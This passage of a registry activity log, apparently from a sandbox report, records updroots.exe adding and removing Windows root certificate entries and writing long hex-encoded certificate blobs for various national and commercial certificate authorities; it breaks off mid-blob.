Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74\Blob = 0b000000010000003c00000053006500630072006500740061007200690061002000640065002000450063006f006e006f006d006900610020004d0065007800690063006f000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000034d499426f9fc2bb27b075bab682aae5effcba74200000000100000098050000308205943082047ca003020102020101300d06092a864886f70d010105050030820131311730150603550407130e416c7661726f204f627265676f6e3119301706035504081310446973747269746f204665646572616c310b3009060355040613024d58310e300c060355041113053031303330311d301b06035504091314496e73757267656e74657320537572203139343031423040060355040313394175746f726964616420436572746966696361646f7261205261697a206465206c6120536563726574617269612064652045636f6e6f6d696131343032060355040b132b446972656363696f6e2047656e6572616c206465204e6f726d6174697669646164204d657263616e74696c311f301d060355040a1316536563726574617269612064652045636f6e6f6d69613124302206092a864886f70d010901161561637273654065636f6e6f6d69612e676f622e6d78301e170d3035303530383030303030305a170d3235303530383030303030305a30820131311730150603550407130e416c7661726f204f627265676f6e3119301706035504081310446973747269746f204665646572616c310b3009060355040613024d58310e300c060355041113053031303330311d301b06035504091314496e73757267656e74657320537572203139343031423040060355040313394175746f726964616420436572746966696361646f7261205261697a206465206c6120536563726574617269612064652045636f6e6f6d696131343032060355040b132b446972656363696f6e2047656e6572616c206465204e6f726d6174697669646164204d657263616e74696c311f301d060355040a1316536563726574617269612064652045636f6e6f6d69613124302206092a864886f70d010901161561637273654065636f6e6f6d69612e676f622e6d7830820122300d06092a864886f70d01010105000382010f003082010a0282010100c164a0f4e75270b2ea9313f4353a1fea3a1cc51b8b58e196d602415e8e8540ff41664053fc98b5d13232976740809dee203f0e54fb4207fb771a99d886f41c2a8825f3e944a34efe07beb1c8ef3c8d87e01eca49103b28ef2451a1fc88174ae71cc8546763e86a31e6436cf6401186c456eebdc91da6463c1e46c2828d2ea9e8ee760a43e0724d8cf4c506fa2c01003360ce3870346b171aeb7a6461a793a4656ad723c7767a94510bec9ea8cf3ba250321c42bd63e187cbb985480ec0d558b6f6ce4bf207cfe304d51fc2d6a36ea3bbb6b76ec4f1a21f16bcb62db0eff45a9b298dbce1fc075b1e09338278cc406d71b363132fd34c36ac394fc6c1b0b6f5850203010001a381b23081af30330603551d1f042c302a3028a026a0248622687474703a2f2f61632e65636f6e6f6d69612e676f622e6d782f6c6173742e63726c30470603551d200440303e303c0608608364650a823c013030302e06082b060105050702011622687474703a2f2f61632e65636f6e6f6d69612e676f622e6d782f6370732e68746d6c300f0603551d130101ff040530030101ff300b0603551d0f040403020106301106096086480186f8420101040403020007300d06092a864886f70d010105050003820101004c2a785304967360ab35acc0c4e3e7c870a5292f8718e5a882de07d508f4cf9e3d9efc4a2c167c9fa29d6510ccc11b9b6a67dab2b31dffcd647a3863ad48fdf372e1fa9fbb57ddbfccc254d8953c66d76b06baafa9e06d08efa4b6903d0c6e2017a796a77c684a9c98c4076fc1026291389b9de38a79539d9f247625f6ad285606aaef07acbaf66ce425317d88803a7846f879e138e013e7612947f3cb1400d3dae2dded73df4bf263e426d875d04d43149016944701ffa1594be4769b5903ded617f67bd75cf8e9e36fc84ee04726b1e29c7c4a31e56411e0b05fda9136481ffa098a6568f50ec29fefb86acf77fe12ed36da1136ad196ac2d48e52d768ef31 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\71899A67BF33AF31BEFDC071F8F733B183856332\Blob = 53000000010000002600000030243022060c2b06010401860e010201080130123010060a2b0601040182373c0101030200c00b00000001000000240000004e006500740077006f0072006b00200053006f006c007500740069006f006e0073000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030803000000010000001400000071899a67bf33af31befdc071f8f733b1838563322000000001000000940300003082039030820278a00302010202101ca02dc1523b6a6d8b5c1f954aedac30300d06092a864886f70d01010505003062310b30090603550406130255533121301f060355040a13184e6574776f726b20536f6c7574696f6e73204c2e4c2e432e3130302e060355040313274e6574776f726b20536f6c7574696f6e7320436572746966696361746520417574686f72697479301e170d3131303130313030303030305a170d3330313233313233353935395a3062310b30090603550406130255533121301f060355040a13184e6574776f726b20536f6c7574696f6e73204c2e4c2e432e3130302e060355040313274e6574776f726b20536f6c7574696f6e7320436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100e4bc7e92306dc6d88e2b0bbc46cee02796dedef9fa12d33c3373b3042fbc718ce59fb622603e5f5dce09ff820c1b9a51501a2689ddd5615d19dc120f2d0aa2435d17d0349220ea73cf382c0626097a72f7fa5032f8c293d369a223ce41b1cce4d51f36d18a3af88c63e2145969ed0dd37f6be8b803e54f6ae59863694805be2eff33b6e9975969f86719ae9361964415d372b03fbc6a7dec487f8dc3abaa712b5369415334b5b0b9c5060ac4b045f5415d6e89457b3d3b268c74c2e5d2d17db211d4fb5832229a80c9dcfd0ce97f5e0397ce3b001487277038a98e6eb327769851e005e321ab1ad585223c29b59a16c580a8f4bb6b308f2f4602a2b10c22e0d30203010001a3423040301d0603551d0e041604142130c9fb00d74e98da87aa2ad0a72eb14031a74c300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100c28984a0e88c66fdff13051bc33a8e98498af8aa005c26fd726aa37e121b94ae54f8218fa7934ff716efb9b9b332c025213166372c09b0fe32b037ec3cb8ce8f08aa0890075c75d5e14e2ccb0224e9a25ee9f5783522061cf21f88b1e15ccc9654fa6f49cc8df15603edcf2c9f27dee5ca8344be4640f9572ed27f312dce83dcfe706b84d0a39fff97d0a8d702ecb12cf0ef73383d99acc44f01bfd56aeac62e3229170acbe6699ed14ab5f6df8e19f895e945a90ecd6d4159209e73c66c711c9cd44d30a87309a015f3a04526c35bfdbbb9d82dd71ff5053019f6ae0f8e628fdfc84f86d91d6116b3c9f0bbfbc7f5af012247ecd8dacf1cf35366ba530901f9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D2441AA8C203AECAA96E501F124D52B68FE4C375 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\679A4F81FC705DDEC419778DD2EBD875F4C242C6\Blob = 030000000100000014000000679a4f81fc705ddec419778dd2ebd875f4c242c6090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b0601050508020206082b060105050703090b000000010000002000000041002d00540072007500730074002d005100750061006c002d003000320000002000000001000000cf030000308203cb308202b3a003020102020300e248300d06092a864886f70d010105050030818b310b300906035504061302415431483046060355040a0c3f412d5472757374204765732e20662e20536963686572686569747373797374656d6520696d20656c656b74722e20446174656e7665726b65687220476d624831183016060355040b0c0f412d54727573742d5175616c2d30323118301606035504030c0f412d54727573742d5175616c2d3032301e170d3034313230323233303030305a170d3134313230323233303030305a30818b310b300906035504061302415431483046060355040a0c3f412d5472757374204765732e20662e20536963686572686569747373797374656d6520696d20656c656b74722e20446174656e7665726b65687220476d624831183016060355040b0c0f412d54727573742d5175616c2d30323118301606035504030c0f412d54727573742d5175616c2d303230820122300d06092a864886f70d01010105000382010f003082010a02820101009691abd78eb059b801bdb41ead99fda1fcea0c966b8f2e4948d8e9e42482e1d8baccebde075c48c6198201474209e17cb99fae8ff6ee5e6ba8a856883856b3e6fec99d4f3438513c9cbef3ac9c1cc83d5c9a84aef7942c14b26437608e14b03b2acd89b522aff7e47fee2c2b33f98e3cad4ca2570ffb82c58e1f01df538cc115a4ddee9a9212d228e96217256031efcf3194f37df3e43c21ab90fc6dcf63a7c612007149d71cc8a0ed639a7de38f28dd60f9d8e616ab26d1d02fbde70d09df6ed4ece53853f4640bba5acc80b53859ec80596584316a5f55914c24e5249a83847abe80f1ee5f2007aa77176c0be255aa967808029e97f02bae58f580503ffe3b0203010001a3363034300f0603551d130101ff040530030101ff30110603551d0e040a0408423d2b24a6c145ce300e0603551d0f0101ff040403020106300d06092a864886f70d0101050500038201010046cb1163500d9b3e45d4482d927c9dbdb66adb88b29a97e83a6bd33c5f077e123a3ea1890d3fa17819f783b405e99bbc5bf4bcbc96175b1dca51873094407275b410a219d2e09a14b1ed35e38616a728e74382476c0b54fefbea62bae60bef64c3814cb649bd461e527535ceabbc1e1fa7148300e1ea1a952af4b5ac737b45917a91aa6415b6ab51efb9e92881418a873ada34c1c0330f5f78432434750d23dce819d996268dc36207762310d2606861e46715dabe4f20cab2398938e40f2f3ccbfec69ac3a17cf75fa00632c5105aae0f247bde500f252dbbf51ddcb22f165a4e196140bfd55f07dcab62a7f27a69cf1eaa12c26e627cd4ba3dd89187cffa2d C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9ED18028FB1E8A9701480A7890A59ACD73DFF871 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97226AAE4A7A64A59BD16787F27F841C0A001FD0\Blob = 0b000000010000001e000000430043004100200049006e00640069006100200032003000300037000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000097226aae4a7a64a59bd16787f27f841c0a001fd0200000000100000027030000308203233082020ba00302010202022780300d06092a864886f70d0101050500303a310b300906035504061302494e31123010060355040a1309496e64696120504b49311730150603550403130e43434120496e6469612032303037301e170d3037303631333037303234385a170d3135303730343037303234385a303a310b300906035504061302494e31123010060355040a1309496e64696120504b49311730150603550403130e43434120496e646961203230303730820122300d06092a864886f70d01010105000382010f003082010a0282010100df8fc7ca4a9cd247e28e32829e51e9080977fcb77e277b4e5d6bf8886fe80be3c0369b80e9e530b054f7a630fe376a584bd4785f549eb13e793d0f1357e246953a1d5c613582edf5c3b4b05268a8f8062b9e514bc25805f4cb9967ac9a212d39d0f8cf98889b1f7df5b1b6c043508383adabfdd6d6fafcf50fc64da74a05959eb85a5931540db8c9bc3742923b03d3f43adc2f4df82e4619ad071a256b6355e6f65dcd46db954995b9678d44eec9f86dca8cc90d9af62e67df7993c74238642ac75139a40596dbbea5080fd410b5efc1c78a0cd2d29cffc931e551590d2b40e28927f695dbb1e4a12bd0b54344d8de9f96da99ad9ad87cdc2390b40526d28ced0203010001a3333031300f0603551d130101ff040530030101ff30110603551d0e040a04084f1ec05827d8b8e4300b0603551d0f040403020106300d06092a864886f70d0101050500038201010072864f4882e8c5f0d9b8b0473319efcb0681a8b6ac87c3b94995922a8158d72b8ea2b827a04c13509d1cb5714c625188960c72ff0b60c435e1f8256eb9c1e1a7563afe86e34dc0abdad42a709bad5a9dd825d1ba85dfc21beb34d608770330647fd6f611098dad7e9e797f9b9ba39444e074b7b789caec045f8bcfe2ebe346db36f79d31ae8674a99deddc704fd3335c308620ae32c12c8f2734b6775e001a928abe88d9385bd4c35ab80f9324d62aae304841f66325cf4d87299eb3abf4f4ac4784592acffdedaf940d5000273373ee77e6e349b8a74c26c1ce916a17b2d241b5a99addd84dd5e310b5d23dc5f4d10cddbcac97d29758e85816059ac6adbd6a C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E7A19029D3D552DC0D0FC692D3EA880D152E1A6B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\96C91B0B95B4109842FAD0D82279FE60FAB91683\Blob = 53000000010000002500000030233021060b2b06010401a53402814a0130123010060a2b0601040182373c0101030200c00b000000010000004400000044002d0054005200550053005400200052006f006f007400200043006c006100730073002000330020004300410020003200200045005600200032003000300039000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030803000000010000001400000096c91b0b95b4109842fad0d82279fe60fab91683200000000100000047040000308204433082032ba00302010202030983f4300d06092a864886f70d01010b05003050310b300906035504061302444531153013060355040a0c0c442d547275737420476d6248312a302806035504030c21442d545255535420526f6f7420436c617373203320434120322045562032303039301e170d3039313130353038353034365a170d3239313130353038353034365a3050310b300906035504061302444531153013060355040a0c0c442d547275737420476d6248312a302806035504030c21442d545255535420526f6f7420436c61737320332043412032204556203230303930820122300d06092a864886f70d01010105000382010f003082010a028201010099f1843470ba2fb730a08ebd7c04cfbe62bc99fd8297d27a0a67963809f6104e952273998dda152de705fc197322b78e9800bc3c3daca16cfbd679254badf0cc64da883e29b80f09d334dd33f562d1e1cd19e9ee184f4c58aee21ed60c5b155ad83ab8c418641ee333b2b589774e0cbfd9946b13976f12a3fe99a904cc15ec606836ed087bb7f5bf93ed6631838cc67134874e17eaaf8b918d1c5641ae22375e37f21dd9d12d0d2f6951a7be66a68a3a2abdc71ab1e114f0be3a1db9cf5bb16afeb4b14620a2fb1e3b70ef93987d8c7396f2c5ef8570ad2926fc1e043e1ca0d80fcb5283627cee8b539590a957a2ea6105d8f94dc427fa6eadedf9d751f76ba50203010001a382012430820120300f0603551d130101ff040530030101ff301d0603551d0e04160414d3948a4c62132a192eccaf728a7d36d79a1cdc67300e0603551d0f0101ff0404030201063081dd0603551d1f0481d53081d2308187a08184a08181867f6c6461703a2f2f6469726563746f72792e642d74727573742e6e65742f434e3d442d5452555354253230526f6f74253230436c617373253230332532304341253230322532304556253230323030392c4f3d442d5472757374253230476d62482c433d44453f63657274696669636174657265766f636174696f6e6c6973743046a044a0428640687474703a2f2f7777772e642d74727573742e6e65742f63726c2f642d74727573745f726f6f745f636c6173735f335f63615f325f65765f323030392e63726c300d06092a864886f70d01010b0500038201010034ed7b5a3ca49488ef1a1175072fb3fe3cfa1e5126eb87f629dee0f1d4c62409e9c1cf551bb430d9ce1afe0651a615a42defb24bbf20282549d1a6367734e864df52b111c7737acd399ec2ad8c7121f25a6bafdf3c4e55afb284651489b977cb2a31becfa36dcf6f489432466fe7718ca0a684193707f20345092b86757cdf5f695700db6ed8a672224b50d4759856dfb718ff434350ae7a447bf07951d7433da7d381d3f0c94fb9dac69786d082c3e4426dfeb0e2644e0e26e7403426b50889d70863633827751e33ea6ea8dd9f994f744d8189804bdd9a97295c2fbe8141b98cffea7d60069ecdd73dd32ea315bca8e626e56fc3dcb80321ea9f16f12c54b5 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\590D2D7D884F402E617EA562321765CF17D894E9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\EABDA240440ABBD694930A01D09764C6C2D77966 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F555CE20DCD3364E0DC7C41EFDD40F50356C122 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CBA1C5F8B0E35EB8B94512D3F934A2E90610D336 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\C4674DDC6CE2967FF9C92E072EF8E8A7FBD6A131 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85B5FF679B0C79961FC86E4422004613DB179284\Blob = 03000000010000001400000085b5ff679b0c79961fc86e4422004613db17928409000000010000005e000000305c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020b000000010000005c00000041006d006500720069006300610020004f006e006c0069006e006500200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000320000002000000001000000a8050000308205a43082038ca003020102020101300d06092a864886f70d01010505003063310b3009060355040613025553311c301a060355040a1313416d6572696361204f6e6c696e6520496e632e313630340603550403132d416d6572696361204f6e6c696e6520526f6f742043657274696669636174696f6e20417574686f726974792032301e170d3032303532383036303030305a170d3337303932393134303830305a3063310b3009060355040613025553311c301a060355040a1313416d6572696361204f6e6c696e6520496e632e313630340603550403132d416d6572696361204f6e6c696e6520526f6f742043657274696669636174696f6e20417574686f72697479203230820222300d06092a864886f70d01010105000382020f003082020a0282020100cc41451de93d4d10f68cb141c9e05ecb0db7bf4773d3f0554dddc60cfab166056acd78b4dc02db4e81f3d7a77c71bc7563a05de3070c48ec25c40320f4ff0e3b12ff9b8de1c6d51bb46d22e3b1db7f2164af86bc57222ad647815744825653bd8614010bfc7f74a45aaef1ba11b59b585a80b4377809337c3247035cc4a58348f457566e813627184fec9b28c2d4b4d77c0c3e0c2bdfca04d7c68eea584ea8a4a5181c6c4598a341d12dd2c76d8d19f1ad79b7813fbd0682272d105805b57805b92fdb0c6b90907e145938bb942413e5d19d14dfd3824d46f0803952320fe384b27a43f25ede5f3f1ddde3b21ba0a12a23036e2e0115875ca67575c79761bede86dcd448dbbd2abf4a55dae87d50fbb48017b894bf013deadaba7ce0586717b958e0888646676c9d10475832d0357c792a90a25a10112335ad2fcce44a5ba7c827f283de5ebb5e77e7e8a56e63c20d5d61d08cd26c5a210eca28a3ce2ae995c748cf966f1d9225c8c6c6c1c10c05ac26c4d275d2e12a67c03d5ba59aebcf7b1aa89d1445e50fa09a65de2f28bdce6f9466834829d8ea658caf93d9649f555726bf6fcb373199a360bb1cad89343262b8432106720ca15c6d46c5fa29cf30de89dc715bddb6373edf50f5b8072526e5bcb5fe3c02b3b7f8be43c18711949e236c178ab88a270c5447f0a9b3c0808ca027eb1d19e3078e7770ca2bf47d76e078670203010001a3633061300f0603551d130101ff040530030101ff301d0603551d0e041604144d45c16838bb73a969a120e7edf522a12314d79e301f0603551d230418301680144d45c16838bb73a969a120e7edf522a12314d79e300e0603551d0f0101ff040403020186300d06092a864886f70d01010505000382020100676b06b95f453b2a4b33b3e61b6b594e22ccb9b7a425c9a7c4f054960b64f3b1584f5e51fcb2977b2765c2e5cae70d0c257b62e3fa9fb487b74546af83a597488ca5bdf1162b9b762c7a35606c118097cca99252e62be669eda9f8362d2c77bf6148d1630bb95b52ed18b0434222a6b177aede69c5cdc71ca1b1a51c10fb18be1a70ddc1924bbe295a9d3f35bee57d51f855e0257523871e5cdcba9db0acb369db1783c9f7de0cbc08dc919ea8d0d7153773a535b8fc7ec5444006c3ebf822805c47ce02e3119f44fffd9a32cc7d64510eeb5726763ae31e223cc2a636dd19efa7fc12f326c05931854c9cd8cfdfa4cccc2993ff946d765c130897f2eda50b4ddde8c9680e66d3000e33125bbc95e53290a8b3c66c83ad77ee8b7e7eb1a9abd3e1f1b6c0b1ea88c0e7d390e92892947b687b972a0a672d85023810e40361d4da2536c708582da1a751af300a49f5a66987072d4446768e2ae59a3bd718a2fc9c3810ccc63bd2b5173a6ffdae25bdf5725964b1742a385f184cdfcf71045a36d4bf2f999ce8d9bab195e6024b21a15bd5c14f8fae696d53db0193b55c1e18dd645aca18283e630411fd1c8d000fb837df678a9d66a9026a91ff13ca2f5d83bc87936cdc245116042566fab3d9c2ba29be9a48388299f4bf3b4a3119f9bf8e213314ca4f545ffbcefb8f717ffd5e19a00f4b91b8c454bc06b0458f2691a28efea9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CC7EA292AF8715D74CA4B415F320154B24F565FD\Blob = 0b000000010000003a00000053006f0075007400680020004100660072006900630061006e00200050006f007300740020004f0066006600690063006500200043004100000009000000010000002a000000302806082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308030000000100000014000000cc7ea292af8715d74ca4b415f320154b24f565fd20000000010000003d0600003082063930820421a003020102020103300d06092a864886f70d01010505003081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203420526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a61301e170d3130303931353030303030305a170d3330303931343030303030305a3081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203420526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a6130820222300d06092a864886f70d01010105000382020f003082020a0282020100dbdced489aa0a39fe0118ed9c892753a55c15122ca0b7aa4350dc5e6572d83f02a6f223837316d7c8524a2062f43823d453040251cee584741e6f09e001ef8f42f11bb92b298452dd31f80c9761413c3cc40e6adeb3960fccfc8df2afd8c1251efcf0c64c657e823515de76652ea66bd937f9d7a28f119706e849f3047b7b0396b132ceb4b4d2eaf3fbffd02134a39e73e33c5109151be0f479d4d52fc2cf3e313a20082e1140ccdd29eb3f2e081dabe999253e37d997743e1e14829819ed605573a71dc3e98ad58706f46bb7e3203e2839b5957f7f8b3cd5416ecb6ada11c1a92d1d4299e8fcdb3e87d50f1c282acbabdb47556a0f5455d187d2c8cf17b41cc86b19a844b0a2a5d9b96e1cdfaab162741e79535a6cb8aa796f3a5cc51f92d7d1e43fbdc6db5b938bd05fb58fa2ed3ec5e642daf58014a7c2246d341cb3de4965e494338bb89ebf49c693912035c84bbe58c1eeae066bbc0bf8cfe9e0a4d3d683f4076d632a9ea45b86a07528ecd51f15d28630cd35938fcc9fd82c94520bce6e8cca20ccb7b6439494645f5731c6a9720eb2142f7b42052b74afd75bccb0f0c6711571ff730f1ab90cc5d3c960562d3ca55014b46c580871c72d0735421ead7a39cd3ae7fd453d928fc57dee53f524abbc8262447531c73bacfc6b430cd5e71c756bc493825e6c5100978d9d41d5ccd6eeddb915ca1531456aa8d27a9a68e1b0203010001a320301e300e0603551d0f0101ff040403020106300c0603551d13040530030101ff300d06092a864886f70d01010505000382020100d10b85d45ea696f0908912d9015308ecf2ed4338893ec12964ee53ff4ffe8b0a0e92f4fd7d2880ce0109fc31d16b5b0389b22e6003e5ef639691295fe03f98f868985563ca4f6b5372bab3621a199ec1131d9982faabaa3380b9f71afc794c02d0e1838b2c782c2f5c3061324fbbd13e955f607655d10e6f794e0ffab875b11ffe0d8b5b8b2842ca4d4563520249cc9d0f5fbb393f619bb15c74439a56c3997f9fc44dc0d38fd7cb5497f5fb487e2782feba63ede86fe384eb693e08f2ca24aa348e6240870dc751d40175dc667affe9ba326f4f8f72356c09ed5b78b0a948fa7c9141b2ac8e313725950c45a5554a19518c55930915c9f440019cb5757caa01feb2694d189a02eb7400fb7b68f4f0c37fa69df4ece842baeb837997fca376195b717f2667e94f2a7bb3cb7ef3fcf5a7bffb3f977575d0cbeb78e3036b8e82d01161fb373da7980b1efe3b5ed9cf00a517e9ecfd0cb5ddb8c6bcbdf3d230ee850e85f952334886e7c6afbfbf0cd04b7040f55ec8553f501c4f07d96776147d660dc2b5caa282340386f8d25ab6129626797a176d98a9ccf9e0cb1a45fff3c00cc562fe13c62dbf6a17ea630d7e3e247e62394e27391b414bc3b1607151fa0982ac0f8dd7d7efde1dab2b51bdf800f3d481c70d981c3dec2fa306c8f55500a73ffd97abb0b54a99590888906c1cb0ffe8ed7c993f2d6aed6d7d6612eed8e031ec C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A59C9B10EC7357515ABB660C4D94F73B9E6E9272\Blob = 030000000100000014000000a59c9b10ec7357515abb660c4d94f73b9e6e9272090000000100000040000000303e06082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030c0b00000001000000500000004300650072007400690070006f0073007400200045002d005400720075007300740020005000720069006d0061007200790020004e006f0072006d0061006c00690073006500640020004300410000002000000001000000e4030000308203e0308202c8a003020102020b040000000001055264c761300d06092a864886f70d0101050500305d310b3009060355040613024245311c301a060355040a13134365727469706f737420732e612e2f6e2e762e3130302e060355040313274365727469706f737420452d5472757374205072696d617279204e6f726d616c69736564204341301e170d3035303732363130303030305a170d3230303732363130303030305a305d310b3009060355040613024245311c301a060355040a13134365727469706f737420732e612e2f6e2e762e3130302e060355040313274365727469706f737420452d5472757374205072696d617279204e6f726d616c6973656420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100d5b3aa52847a1793220fb80418cac9f2822aac150ba75071b64c256bf7ff01aa575a774e5e13140d55f21ef185cd85d7821c0cda092bbdfdbc9efe6d894da20224e651ea377f31465a7b9a76b32ea05d5fe4f8990a07beee922612c97be75d6cd083470ec08ca7d17957c00b199c9b9e43c54e9125ce882b6d79d9798ad6664e22c31a454eefc8b062264e2654509f0c6fb36bcc7c9f7fde0f0db58fc36bd4e1c2fbbb5650aa8c3d8f008b3cfc48176ad25af3756d6581bd465d9fa26253aecef3a9e4912b5a26c37966d1a65366351c0671b1ee990ec4fb5812ac22462de22292dbe13cbfbbfe86e7933473cf7869d3cbdef90cb268dac98a0a6054c4f356630203010001a381a030819d300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff30480603551d200441303f303d060903900e0701000102003030302e06082b060105050702011622687474703a2f2f7777772e652d74727573742e62652f4350532f514e636572747320301d0603551d0e0416041411f20b96d2333881575813fd40a4116f4e99fa67301106096086480186f8420101040403020007300d06092a864886f70d01010505000382010100356b4fde9df303b61dc8bc8de75e6a9ea9e9eda22b97eaafd1e146d302497dc45285ebbaf6d3bf3962189d9349bd7803bfd35e15ddef271ce1bb45012281004d3ae085ca5a3203cc208fafefc1dba8faf3dcd7b2b10f03810929e0717c8bfa7fcb366e1be814cef04b26a132294fccb4f587480c13fcc79dafabd493f52a4d7f4882583e17ffc3802aab3f5755b8392c661064266d8c6bd6dda0831a5a56119646bdae7028d638575b91d53f4de9acb3c3244a96655c34d01ed4bf08a5975df746db76f0cd3e7563002bafadae86de5fa699540d8523a5fcbaed1b52fa491877855baa729b270835453727db97c9fa8b3dc8d09dde5aef5da316b69879ca7ccb C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob = 0f00000001000000100000009df0d13100123aeca770130f4ad8d209030000000100000014000000245c97df7514e7cf2df8be72ae957b9e04741e8509000000010000000c000000300a06082b060105050703080b00000001000000320000004d006900630072006f0073006f00660074002000540069006d0065007300740061006d007000200052006f006f00740000002000000001000000b1020000308202ad30820216020101300d06092a864886f70d010104050030819e3120301e060355040a13174d6963726f736f6674205472757374204e6574776f726b311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e312d302b060355040b13244d6963726f736f66742054696d65205374616d70696e67205365727669636520526f6f74312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e301e170d3937303531333136313235395a170d3939313233303233353935395a30819e3120301e060355040a13174d6963726f736f6674205472757374204e6574776f726b311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e312d302b060355040b13244d6963726f736f66742054696d65205374616d70696e67205365727669636520526f6f74312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e30819f300d06092a864886f70d010101050003818d0030818902818100b75a38f51f37cca943c4dc2418bef28552b41d5b5f18b90b8f4b6da8ffcd40506cd3a0d35c47c2b9f786e4cd7d350569371faf3ddd1ffd8f1534c2c479cc59748a6f8c0ec3e811eb8438479853e1f10c0de4010cf01b1e20da2a7a3dc215528e8aff7b32bf581e25988326cb8ac9c4071424bc